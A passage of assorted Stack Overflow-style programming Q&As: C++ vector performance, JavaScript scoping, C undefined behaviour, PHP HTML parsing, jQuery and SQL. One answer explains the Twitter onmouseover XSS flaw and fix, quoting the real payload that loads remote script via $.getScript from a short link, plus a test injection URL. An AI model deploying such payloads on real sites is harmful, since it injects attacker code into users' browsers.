for(int i = 0; i < 1000; ++i)
{
int dimension = 999;

std::vector<Pixel> pixels;
pixels.resize(dimension * dimension);

for(int i = 0; i < dimension * dimension; ++i)
{
pixels[i].r = 255;
pixels[i].g = 0;
pixels[i].b = 0;
}
}
}

void UseVectorPushBack()
{
TestTimer t("UseVectorPushBack");

for(int i = 0; i < 1000; ++i)
{
int dimension = 999;

std::vector<Pixel> pixels;
pixels.reserve(dimension * dimension);

for(int i = 0; i < dimension * dimension; ++i)
pixels.push_back(Pixel(255, 0, 0));
}
}

void UseArray()
{
TestTimer t("UseArray");

for(int i = 0; i < 1000; ++i)
{
int dimension = 999;

Pixel * pixels = (Pixel *)malloc(sizeof(Pixel) * dimension * dimension);

for(int i = 0 ; i < dimension * dimension; ++i)
{
pixels[i].r = 255;
pixels[i].g = 0;
pixels[i].b = 0;
}

free(pixels);
}
}

int main()
{
TestTimer t1("The whole thing");

UseArray();
UseVector();
UseVectorPushBack();

return 0;
}
``````

Am I doing it wrong or something? Or have I just busted this performance myth?

Edit: I'm using Release mode in MSVS2005.

In MSVC, `#define _SECURE_SCL 0` reduces `UseVector` by half (bringing it down to 4 seconds). This is really huge IMO. Someone please upvote me a couple more times so this gets known by more folks :p

Using the following:

g++ -O3 Time.cpp -I <MyBoost>
./a.out
UseArray completed in 2.196 seconds
UseVector completed in 4.412 seconds
UseVectorPushBack completed in 8.017 seconds
The whole thing completed in 14.626 seconds

So array is twice as quick as vector.

But after looking at the code in more detail this is expected; as you run across the vector twice and the array only once. Note: when you resize() the vector you are not only allocating the memory but also running through the vector and calling the constructor on each member.

Re-Arranging the code slightly so that the vector only initializes each object once:

`````` std::vector<Pixel>  pixels(dimensions * dimensions, Pixel(255,0,0));
``````

Now doing the same timing again:

g++ -O3 Time.cpp -I <MyBoost>
./a.out
UseVector completed in 2.216 seconds

The vector now performance only slightly worse than the array. IMO this difference is insignificant and could be caused by a whole bunch of things not associated with the test.

I would also take into account that you are not correctly initializing/Destroying the Pixel object in the UseArrray() method as neither constructor/destructor is not called (this may not be an issue for this simple class but anything slightly more complex (ie with pointers or members with pointers) will cause problems.

## What is this practice called in JavaScript?

When you wrap your JavaScript code in a function like this:

``````(function(){

var field = ...;
function doSomthing(){...
...

})();
``````

I noticed that this fixes scoping problems for me on a lot of web pages. What is this practice called?

The pattern is called self-invocation, a self-invoking function. It can create a closure, but that is an effect of the pattern (perhaps the intended effect), not the pattern itself.

## Today's XSS onmouseover exploit on twitter.com

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:

`http://t.co/@"style="font-size:999999999999px;"onmouseover="\$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/`

Is this technically an XSS attack or something else?

The vulnerability is because URLs were not being parsed properly. For example, the following URL is posted to Twitter:

``````http://thisisatest.com/@"onmouseover="alert('test xss')"/
``````

Twitter treats this as the URL. When it is parsed Twitter wraps a link around that code, so the HTML now looks like:

``````<a href="http://thisisatest.com/@"onmouseover="alert('test xss')"rel/" target="_blank" ="">http://thisisatest.com/@"onmouseover="alert('test xss')"/</a></span>
``````

You can see that by putting in the URL and the trailing slash, Twitter thinks it has a valid URL even though it contains a quote mark in it which allows it to escape (ie. terminate the `href` attribute, for the pedants out there) the URL attribute and include a mouse over. You can write anything to the page, including closing the link and including a script element. Also, you are not limited by the 140 character limit because you can use `\$.getScript()`.

This commit, if it were pulled, would have prevented this XSS vulnerability.

In detail, the offending regex was:

``````REGEXEN[:valid_url_path_chars] = /(?:
#{REGEXEN[:wikipedia_disambiguation]}|
@[^\/]+\/|
[\.\,]?#{REGEXEN[:valid_general_url_path_chars]}
)/ix
``````

The `@[^\/]+\/` part allowed any character (except a forward slash) when it was prefixed by an @ sign and suffixed by a forward slash.

By changing to `@#{REGEXEN[:valid_general_url_path_chars]}+\/` it now only allows valid URL characters.

## Get rid of ugly if statements

I have this ugly code:

``````if ( v > 10 ) size = 6;
if ( v > 22 ) size = 5;
if ( v > 51 ) size = 4;
if ( v > 68 ) size = 3;
if ( v > 117 ) size = 2;
if ( v > 145 ) size = 1;
return size;
``````

How can I get rid of the multiple if statements?

``````if ( v > 145 ) size = 1;
else if ( v > 117 ) size = 2;
else if ( v > 68 ) size = 3;
else if ( v > 51 ) size = 4;
else if ( v > 22 ) size = 5;
else if ( v > 10 ) size = 6;

return size;
``````

This is better for your case.

Optionally you should choose Switch Case where ever possible

`Update:` If you have analyzed the value of 'v' generally resides in lower range(<10) in most of the cases than you can add this.

``````if(v < 10)           size = SOME_DEFAULT_VALUE;
else if ( v > 145 )  size = 1;
else if ( v > 117 )  size = 2;
else if ( v > 68 )   size = 3;
else if ( v > 51 )   size = 4;
else if ( v > 22 )   size = 5;
else if ( v > 10 )   size = 6;
``````

`further :` You can also alter the condition sequence, according to your analysis. If you know that most of the values are less than 10 and then in the second place most of values lie between 68-117, you can alter the condition sequence accordingly.

## -1 * int.MinValue == int.MinValue?? Is this a bug?

In C# I see that

``````-1 * int.MinValue == int.MinValue
``````

Is this a bug? It really screwed me up when I was trying to implement a search tree. I ended up using `(int.MinValue + 1)` so that I could properly negate it.

This is not a bug.

`int.MinValue * -1` is `1` greater than `int.MaxValue` can hold. Thus, the number wraps around back to `int.MinValue`.

This is basically caused by an integer overflow.

`Int32.MinValue`:

The value of this constant is `-2,147,483,648`

`Int32.MaxValue`:

The value of this constant is `2,147,483,647`

So, `-2,147,483,648 * -1 = 2,147,483,648` which is `1` greater than `Int32.MaxValue`.

## Is the "struct hack" technically undefined behavior?

What I am asking about is the well known "last member of a struct has variable length" trick. It goes something like this:

``````struct T {
int len;
char s[1];
};

struct T *p = malloc(sizeof(struct T) + 100);
p->len = 100;
strcpy(p->s, "hello world");
``````

Because of the way that the struct is laid out in memory, we are able to overlay the struct over a larger than necessary block and treat the last member as if it were larger than the `1 char` specified.

So the question is: Is this technique technically undefined behavior?. I would expect that it is, but was curious what the standard says about this.

PS: I am aware of the C99 approach to this, I would like the answers to stick specifically to the version of the trick as listed above.

As the C FAQ says:

It's not clear if it's legal or portable, but it is rather popular.

and:

... an official interpretation has deemed that it is not strictly conforming with the C Standard, although it does seem to work under all known implementations. (Compilers which check array bounds carefully might issue warnings.)

The rationale behind the 'strictly conforming' bit is in the spec, section J.2 Undefined behavior, which includes in the list of undefined behavior:

• An array subscript is out of range, even if an object is apparently accessible with the given subscript (as in the lvalue expression `a[1][7]` given the declaration `int a[4][5]`) (6.5.6).

Paragraph 8 of Section 6.5.6 Additive operators has another mention that access beyond defined array bounds is undefined:

If both the pointer operand and the result point to elements of the same array object, or one past the last element of the array object, the evaluation shall not produce an overflow; otherwise, the behavior is undefined.

## How to parse HTML with PHP?

Suggestion for a reference question. Stack Overflow has dozens of "How to parse HTML" questions coming in every day. However, it is very difficult to close as a duplicate because most questions deal with the specific scenario presented by the asker. This question is an attempt to build a generic "reference question" that covers all aspects of the issue.

This is an experiment. If such a reference question already exists, let me know and I'll happily remove this one.

My ideal vision is that each of the three questions gets answered separately, and the best answers to each bubble up to the top.

I will be awarding a 200 bounty to the best answer in each of the three categories two weeks from now, pending discussion of this question on Meta.

Each of these questions have already been answered brilliantly elsewhere, so copy+pasting your own answer to a different question is fine with me.

How do I parse HTML with PHP?

1. What libraries are there? Which ones use PHP's native DOM, which ones come with their own parsing engine? (Hint: SimpleHTMLDOM)

1a. I need to find a specific element, but I find it hard to get used to the XPath syntax. Are there any DOM-based libraries that make parsing HTML easier? Please consider making generic real world examples.

2. Is there a PHP library that enables me to query the DOM using CSS[2/3] selectors, like jQuery does? (Hint: phpQuery) Please consider making generic real world examples.

3. Bonus question: Why shouldn't I use regular expressions? Please provide a very short answer in layman's terms.

phpQuery and QueryPath are extremely similar in replicating the fluent jQuery API. That's also why they're one of the easiest approaches to properly parse HTML in PHP.

Examples for QueryPath

Basically you first create a queryable DOM tree from a HTML string:

`````` \$qp = qp("<html><body><h1>title</h1>..."); // or give filename or URL
``````

The resulting object contains a complete tree representation of the HTML document. It can be traversed using DOM methods. But the common approach is to use CSS selectors like in jQuery:

`````` \$qp->find("div.classname")->children()->...;

foreach (\$qp->find("p img") as \$img) {
print qp(\$img)->attr("src");
}
``````

Mostly you want to use simple #id and .class or DIV tag selectors for ->find(). But you can also use xpath statements, which sometimes are faster. Also typical jQuery methods like ->children() and ->text() and particularily ->attr() simplify extracting the right HTML snippets. (And already have their SGML entities decoded.)

`````` \$qp->xpath("//div/p[1]");  // get first paragraph in a div
``````

QueryPath also allows injecting new tags into the stream (->append), and later output and prettify an updated document (->writeHTML). It can not only parse malformed HTML, but also various XML dialects (with namespaces), and even extract data from HTML microformats (XFN, vCard).

`````` \$qp->find("a[target=_blank]")->toggleClass("usability-blunder");
``````

.

phpQuery or QueryPath?

Generally QueryPath is better suited for manipulation of documents. While phpQuery also implements some pseudo AJAX methods (just HTTP requests) to more closely resemble jQuery. It is said that phpQuery is often faster than QueryPath (because overall less features).
For further informations on the differences see this comparison: http://www.tagbytag.org/articles/phpquery-vs-querypath

And here's a comprehensive QueryPath introduction: http://www.ibm.com/developerworks/opensource/library/os-php-querypath/index.html?S_TACT=105AGX01&S_CMP=HP

• Simplicity and Reliability
• Simple to use alternatives ->find("a img, a object, div a")
• Proper data unescaping (in comparison to regular expression greping)

## Why doesn't jQuery bomb if your selector object is invalid?

Was recently using some code along the lines of

``````\$("#divMenuContainer:visible").hide("explode");
``````

However after some time spent trying to get it to work I realized my selector was referencing a div that didnt exist.

The result of the query was simply that it didn’t execute.

Obviously this is by design, could anyone explain the logic of why this design choice was made rather than raise some sort of exception?

Not trying to criticise just trying to understand.

There are a few good reasons here, "chainability" is the main drive, the ability to write very terse code by chaining has to throw no errors to work seemlessly, for example:

``````\$("#divMenuContainer:visible").hide("explode").add("#another").fadeIn();
``````

Each object in the chain, even if it references no DOM elements may have more added later, or let's take another example:

``````\$("#divMenuContainer:visible").live("click", function() { ... });
``````

In this case we don't care about any of the elements the selector found, we care about the selector itself. Here's another:

``````\$("#divMenuContainer:visible").find(".child").hide("explode").end().fadeOut();
``````

Even if there are no children, we may want to hop back in the chain afterwards, continuing to use the `.prevObject` reference to go back up the chain.

There are dozens of distinct cases like this that show the benefits of the library being the way it is. As for the why, from interviews of John Resig, who is the creator of jQuery, he states that's just how it worked out. He was after code as terse as he could get it, and the chaining model is what came out of hat, it just happens to have a lot of benefits as well, the example above are just a few of those.

To be clear, I'm not saying every attribute of chaining is a good one, there are just many upsides to it.

``````\$(".comment").click(replyToFunction);
``````

Should that fail because there aren't any comments yet? Well no not really, that's expected, I wouldn't want an error here...if the element exists do it, if not don't. My point is, at least in my experience, not throwing an error because of a missing element is tremendously more useful than throwing one.

The selector in your question, the `#ID`selector is a very special case where you expect only a single element, so maybe you could argue it should fail there...but then that wouldn't be consistent with other selectors, and you want a library to be consistent.

With pretty much any other selector you expect 0-many elements, so failing when you don't find any elements would be significantly less desirable in most situations, even more so in the cases like `.live()` above.

## How many JavaScript programs are executed for a single web-page in the browser?

JavaScript programs consist of statements and function declarations. When a JavaScript program is executed, these two steps occur:

1. the code is scanned for function declarations, and every func. declaration is "executed" (by creating a function object) and a named reference to that function is created (so that this function can be called from within a statement)

2. the statements are executed (evaluated) sequentially (as they appear in the code)

Because of that, this works just fine:

``````<script>
foo();
function foo() {
return;
}
</script>
``````

Although the "foo" function is called before it is declared, it works because the function declaration is evaluated before the statement.

However, this does not work:

``````<script>
foo();
</script>
<script>
function foo() {
return;
}
</script>
``````

A ReferenceError will be thrown ("foo is not defined"). This leads to the conclusion that every SCRIPT element inside the HTML code of the web-page represents a separate JavaScript program and every time the HTML parser encounters a SCRIPT element, it executes the program inside that element (and then once the program is executed, the parser moves on to the HTML code that follows the SCRIPT element).

Then again, this does work:

``````<script>
function foo() {
return;
}
</script>
<script>
foo();
</script>
``````

My understanding here is that the Global object (which serves as the Variable object in the global execution context) exists (and remains) at all times, so the first JavaScript program will create the function object and make a reference for it, and then the second JavaScript program will use that reference to call the function. Therefore, all JavaScript programs (within a single web-page) "use" the same Global object, and all changes done to the Global object by one JavaScript program can be observed by all JavaScript programs that run subsequently.

Now, note this...

``````<script>
// assuming that foo is not defined
foo();
</script>
``````

In the above case, the alert call will not execute, because the "foo()" statement throws a ReferenceError (which breaks the whole JavaScript program) and therefore, all subsequent statements do not execute.

However, in this case...

``````<script>
// assuming that foo is not defined
foo();
</script>
<script>
</script>
``````

Now, the alert call does get executed. The first JavaScript program throws a ReferenceError (and as a consequence breaks), but the second JavaScript program runs normally. Of course, the browser will report the error (although it did execute subsequent JavaScript programs, after the error occurred).

Now, my conclusions are:

• every SCRIPT element within the HTML code of the web-page represents a separate JavaScript program. These programs execute immediately as the HTML parser encounters them.
• all JavaScript programs within the same web-page "use" the same Global object. That Global object exists at all times (from the moment the web-page is fetched up until the web-page is destroyed). JavaScript programs may manipulate the Global object, and all changes done to the Global object by one JavaScript program can be observed in all subsequent JavaScript programs.
• if one JavaScript program breaks (by having an error thrown), that does not prevent subsequent JavaScript programs to execute.

Please fact-check this post and tell me if I got something wrong.

Also, I have not found resources that explain the behaviors mentioned in this post, and I assume that the browser makers must have published such resources somewhere, so if you know about them, please provide the links to them.

UPDATE!

OK, I am going to (try to) answer my own question here :) I got a response (via e-mail) from Dmitry A. Soshnikov (he runs a blog about JavaScript at http://www.dmitrysoshnikov.com/ ).

His take on this issue is this: Each SCRIPT block contains global code. Executing each SCRIPT block creates a new execution context. Therefore, each SCRIPT block has its own execution context, but all those execution contexts share the same Global object.

SCRIPT blocks could be viewed as different "sub-programs" with the same shared state.

Furthermore, the ECMAScript spec (3rd edition) states (chapter 10): "Global code is source text that is treated as an ECMAScript Program."

Dmitry Soshnikov has answered your question. Every `<script>` element is executed as a Program, as defined by the ECMAScript specification. There is one global object that each Program within a single page uses. And that's really it.

## Why is SELECT * considered harmful?

Why is `SELECT *` bad practice? Wouldn't it mean less code to change if you added a new column you wanted?

I understand that `SELECT COUNT(*)` is a performance problem on some DBs, but what if you really wanted every column?

The asterisk character, "*", in the SELECT statement is shorthand for all the columns in the table(s) involved in the query.

## Performance

The `*` shorthand can be slower because:

• Not all the fields are indexed, forcing a full table scan - less efficient
• What you save to send `SELECT *` over the wire risks a full table scan
• Returning more data than is needed
• Returning trailing columns using variable length data type can result in search overhead

## Maintenance

When using `SELECT *`:

• Someone unfamiliar with the codebase would be forced to consult documentation to know what columns are being returned before being able to make competent changes. Making code more readable, minimizing the ambiguity and work necessary for people unfamiliar with the code saves more time and effort in the long run.
• If code depends on column order, `SELECT *` will hide an error waiting to happen if a table had its column order changed.
• Even if you need every column at the time the query is written, that might not be the case in the future
• the usage complicates profiling

## Design

`SELECT *` is an anti-pattern:

• The purpose of the query is less obvious; the columns used by the application is opaque
• It breaks the modularity rule about using strict typing whenever possible. Explicit is almost universally better.

## When Should "SELECT *" Be Used?

It's acceptable to use `SELECT *` when there's the explicit need for every column in the table(s) involved, as opposed to every column that existed when the query was written. The database will internally expand the * into the complete list of columns - there's no performance difference.

Otherwise, explicitly list every column that is to be used in the query - preferably while using a table alias.